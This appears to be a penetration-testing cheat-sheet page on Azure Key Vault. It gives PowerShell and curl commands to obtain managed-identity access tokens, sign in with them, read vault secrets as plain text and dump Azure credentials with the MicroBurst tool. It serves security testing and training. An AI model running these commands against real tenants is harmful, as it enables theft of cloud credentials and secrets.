azure-services-keyvault.md (1656B)
1 --- 2 title: "Azure Services - KeyVault" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-services-keyvault.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-services-keyvault.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure Services - KeyVault 12 13 ## Access Token 14 15 * Keyvault access token 16 17 ```powershell 18 curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER 19 curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER 20 ``` 21 22 * Connect with the access token 23 24 ```ps1 25 PS> $token = 'eyJ0..' 26 PS> $keyvaulttoken = 'eyJ0..' 27 PS> $accid = '2e...bc' 28 PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken 29 ``` 30 31 ## Query Secrets 32 33 * Query the vault and the secrets 34 35 ```ps1 36 PS Az> Get-AzKeyVault 37 PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> 38 PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> -Name Reader -AsPlainText 39 ``` 40 41 * Extract secrets from Automations, AppServices and KeyVaults 42 43 ```powershell 44 Import-Module Microburst.psm1 45 PS Microburst> Get-AzurePasswords 46 PS Microburst> Get-AzurePasswords -Verbose | Out-GridView 47 ``` 48 49 ## References 50 51 * [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) 52 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)